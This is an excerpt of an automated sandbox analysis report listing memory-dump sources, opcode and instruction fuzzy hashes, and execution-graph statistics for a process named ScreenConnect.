                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 12e9194aab34d9b91371729fe645e5b2fea3a95834ec68f71daea863b82a0662
                                                                                                                                                                                                                                                        • Instruction ID: 4caf113595c4d671fb5d5d512ed99b695d24d765554b3352320a94a73aa8e221
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e9194aab34d9b91371729fe645e5b2fea3a95834ec68f71daea863b82a0662
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F090713003049FE714DB68E480A6DB3E6EF846A1B148A35E919DB790EAB1ED458791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d0599d6ebd533fd9736ccad5d77c84b6dd8b6e11b91ffcba943410e1f469311
                                                                                                                                                                                                                                                        • Instruction ID: a02e6ae649de5af6bba50730b3d24bae4bf59d6acbd6317681637f589995934a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d0599d6ebd533fd9736ccad5d77c84b6dd8b6e11b91ffcba943410e1f469311
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74E06575B0420CAF5B05CA4ED400D5BBBEEEFC8220714C02AFC0DC7305D975D9518BA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d35c6e512b830484f9435dddcc020db601c43947c3d648d37a16a7aaf8b07bc5
                                                                                                                                                                                                                                                        • Instruction ID: 6268ad31b926e41656ce21d003b13bff019ccb13ece4f8db91028f30ceb99389
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d35c6e512b830484f9435dddcc020db601c43947c3d648d37a16a7aaf8b07bc5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF0A0B63003008FD3089B18E144B967BE2FF88715B5680A9D589CB3B1DA70ED42CB40
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3dd62607a199eb93904416edab8de303fe6a3023c8bbb38dd79362c521817390
                                                                                                                                                                                                                                                        • Instruction ID: 6e663a2caa404ace2377e037f9e87b5117fbe9dbd6519b3e0f224485264b5039
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dd62607a199eb93904416edab8de303fe6a3023c8bbb38dd79362c521817390
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0A930908288DBCB02EBA8D5815DC7FB1EF02260F5049D9C495AB196CB342B82CB82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1518dc9f0ddcd5f74a10ee402060d567a7864434d350ec87351be35599a85155
                                                                                                                                                                                                                                                        • Instruction ID: 62bdd4bd1791666fad9ef6a8ae1b060522713ed05271f60270842526c3475aef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1518dc9f0ddcd5f74a10ee402060d567a7864434d350ec87351be35599a85155
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BE02BB29083043FC7059BADA4105DD7FF8EF8A310B15009BD40CD7342E93156468396
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2608d5fba781e5fbaf621aef7f48731e294c23f997acab75e2d6ff4fd06c1163
                                                                                                                                                                                                                                                        • Instruction ID: ed38a1b05f9a325c337012ff045104865e563fc5bbe838c3fdd489a2d69ef75b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2608d5fba781e5fbaf621aef7f48731e294c23f997acab75e2d6ff4fd06c1163
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0B271E002199F8B40DFADC840AEEFBF4EF49200B20846AD918E7210E331AA52CB80
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8be526104f5703dafcf2cce64853d44fb9ac5902ef0e5a163a607a2fbd30e792
                                                                                                                                                                                                                                                        • Instruction ID: ac83e62f8b31996124fc8378051d38f8320570fcaa497a2302c55fc69d453f8e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8be526104f5703dafcf2cce64853d44fb9ac5902ef0e5a163a607a2fbd30e792
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE026323003145B9B142EAFB48C56EBBDFEBC8A61754443DEA0ED7340CE799C0A47A4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 828aec18fe024edbc8e812654aedc0d84fe23ca7d44143a7d00b9c53a2670f27
                                                                                                                                                                                                                                                        • Instruction ID: eb7c0a84459dab296b0230cee1f80f3363645b8b43cf73e755a656827648d615
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 828aec18fe024edbc8e812654aedc0d84fe23ca7d44143a7d00b9c53a2670f27
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E0D8326043005B83006769A40549F77A6FEC2B51740C47EE60BCB344DEB2EE4A8FE2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 41a925e7c487a6406e36a7000f8debcc4295892d3f92fc847de47d38eef7d68b
                                                                                                                                                                                                                                                        • Instruction ID: 5b4056ee8073dfc97c7e45a2ab2a8fd83cf3badef0aabab31a1d859c0f3ab113
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41a925e7c487a6406e36a7000f8debcc4295892d3f92fc847de47d38eef7d68b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE0E5363052004BC3056F78F95409C3F56EBD5262324417ED545E33CACE289D16C341
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96D05E353906148FC748EB3DE44496E3BDAAF8962035180A4E409CB321DE60EC0187D0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2427ef4dfe57c5009ed5640f899d7b2813fc1d65b8e9d03c886a79a614201d34
                                                                                                                                                                                                                                                        • Instruction ID: 01fe044031dcda0b86a6f1afdcdc93d83af0d519e787db2f8e14c95d80fa723a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2427ef4dfe57c5009ed5640f899d7b2813fc1d65b8e9d03c886a79a614201d34
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EE01271E0110DFFCB40DFA4F98059C7BB5EB5D204B504598D409E7310EA316F429B51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 049f2dd95711ce9b7537af655bf0352359695e9fcc4950ae1177acf7ec33e618
                                                                                                                                                                                                                                                        • Instruction ID: 5d23cfaed0ccdad24d00a7ba7af443dae4a2e399f5cc25c189e7c941ac37f82d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 049f2dd95711ce9b7537af655bf0352359695e9fcc4950ae1177acf7ec33e618
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E08C35A44255DFCB80DBBCD8048CDBFB0EB092B071446D9E56AEB2A2E3355A16CB41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9dbef6d6b4d8535d2300c257a5e326a29d6f326f2dacb730468284c6efa952f0
                                                                                                                                                                                                                                                        • Instruction ID: 06cf7de0d6a0bf33b5309bdfebe27cdcff3a60b6386d35604988a1d6d243d7c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dbef6d6b4d8535d2300c257a5e326a29d6f326f2dacb730468284c6efa952f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07D05E3038021CCFAA68CE29D440A1137E87F86E123A300A5D90ACB376DA30EC82CB52
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ebfbd4be44d70b6e09e118202d23f835b5232f7a7e247a0e6f6313ba0742be43
                                                                                                                                                                                                                                                        • Instruction ID: 11d73887845875533cc40d7282a7d5f97b24031af0b3aa81629442ab61f416a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebfbd4be44d70b6e09e118202d23f835b5232f7a7e247a0e6f6313ba0742be43
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CD01271901109EFCF00EFA4E95065DB7B9EB45204B90C5A9D849E3300DE316F049B51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e90476dad26df2089d6c7c343f395c6007ebac43930cfd2a68b5b9b4ed5f8f2d
                                                                                                                                                                                                                                                        • Instruction ID: a1911d2f5b6fa1e73e044f4cc841a09dc32f3b701e39efed3f7b0027d665b45c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e90476dad26df2089d6c7c343f395c6007ebac43930cfd2a68b5b9b4ed5f8f2d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76D01270D05109FFDB00DFA8D94059D77B9EB45204B5085ACD409E3300DA316F019B95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1351eae6b4ff8b93b3a100862cbeaf442fb4be931cd73cb8fc58909fe129fb8d
                                                                                                                                                                                                                                                        • Instruction ID: 37af0040b478089adaf178566118b6cfe2137bd2d9d1c4833a4c3a230878a5e8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1351eae6b4ff8b93b3a100862cbeaf442fb4be931cd73cb8fc58909fe129fb8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0D01770E0020DEFCB40DFA8E94059DBBF9EB59204B5045A8D809E7210EA317F019B91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e375a6f3271979ccc3963342919991701e8f11f4b870e5a32eb0d4d41216f66d
                                                                                                                                                                                                                                                        • Instruction ID: 48adebdaa6e6e771734445fdf1df99ec0716985de8ca1f5d1f625e33f19b3a06
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e375a6f3271979ccc3963342919991701e8f11f4b870e5a32eb0d4d41216f66d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BC08076B440104FC344D71CDC51515E7D39BD524473DC4BB6509D77A5D931CD038384
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1a8fc6bc692e78b5320d3735b381e5b2a28f3a38f9f46600df1d348115205569
                                                                                                                                                                                                                                                        • Instruction ID: e5110b4525cac616f351ec3cb148442d6443b3c0e1a2ea922d401de2607383d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a8fc6bc692e78b5320d3735b381e5b2a28f3a38f9f46600df1d348115205569
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AD09E3181470999C700BA68D454469B778EAD5200F00D65EE44956111EB70A6909681
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:5
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 18141 7ff7bfec8014 18143 7ff7bfec801d 18141->18143 18142 7ff7bfec8082 18143->18142 18144 7ff7bfec80f6 SetProcessMitigationPolicy 18143->18144 18145 7ff7bfec8152 18144->18145
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                        • API String ID: 0-3887548279

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 3558871457d2c158fa85527ada6e8cbc94fc6d0bd6742d17515ee474eba225ce
                                                                                                                                                                                                                                                        • Instruction ID: b5eded94aff34b3b56eaf3f06934ecc69a0b7ebfd7bcc86f2eab20ff7f275b6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3558871457d2c158fa85527ada6e8cbc94fc6d0bd6742d17515ee474eba225ce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66C1B330A18F568BE756BF6894617FDF3D6EF95B24F944079D04EC7282DF28B80182A1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 37b9cd1e330d70e1a83b6440dfa9a1db9c611968afba5172f090f0285a9725e0
                                                                                                                                                                                                                                                        • Instruction ID: ec7d557adc9984a68d161a271996cb33fe185319d35459c097950b75815123be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37b9cd1e330d70e1a83b6440dfa9a1db9c611968afba5172f090f0285a9725e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA92EE70A18A4A8FDB99AF2890557B9F3E1FF94750F94427DD44EC7287CE38B8058781
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 602a4e83429cf8926612379bc217706e7b1925ef13d63db8655c60a97d96358a
                                                                                                                                                                                                                                                        • Instruction ID: bb7b2884c58760aecc40e7aa3dad336e1ac9e5d7fc5a39da27b861254852b7ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 602a4e83429cf8926612379bc217706e7b1925ef13d63db8655c60a97d96358a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0052C07090864A4BEB59EF24D8517E9B7E1EF95710F9002BED40ED73C2CF3869468B91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c95e11b76c6eaf483392611a27dad043a2c715c09caec643aafa0d3055cc8bc5
                                                                                                                                                                                                                                                        • Instruction ID: 11cdc2e74e8da31f4943f38ad27d08a51a72f55ee44cb98e4dd5a270616a7824
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c95e11b76c6eaf483392611a27dad043a2c715c09caec643aafa0d3055cc8bc5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC121531A1CF4A4FD759AB2CA855679F3D1FF98720B9446BAD44EC7282DE24F80287C1

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1805534008.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7bfec0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
